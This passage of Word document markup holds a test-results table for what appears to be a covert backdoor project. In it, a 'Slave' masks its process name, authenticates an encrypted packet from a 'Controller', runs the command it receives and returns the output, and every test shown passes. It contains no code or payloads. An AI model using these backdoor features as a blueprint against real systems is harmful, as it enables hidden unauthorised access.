              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> command, we see that it exists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2780" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>The Slave’s process is masked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, kill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>If we kill the Slave’s masked process name, the Slave should die</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2780" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Packet has the proper information configured in its headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wireshark shows that the packet has the proper destination IP and destination Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2780" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Slave is listening on the same port as the Controller is sending on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">If the ports are not the same, we will not connect. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2780" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Slave is able to receive the packet that was destined for it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wireshark,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal responds with appropriate message as expected; Wireshark displays the same packet as in [2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2780" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Slave is able to decrypt the password and authenticate the Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>If the password does not match, there will be no attempt to connect to the Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2780" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Slave is able to decrypt the password and authenticate the Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>If the encrypt/decrypt key does not match, there will be no attempt to connect to the Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2780" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Slave is able to decrypt the password and authenticate the Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal responds with appropriate message that the Slave has successfully connected with the Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2780" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Once authenticated and connected, the Slave will execute the command specified in [3]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wireshark, Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Command is executed; the results are then sent back to the controller; Wireshark packet capture shows content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2780" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Controller receives content from the Slave</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcMar>
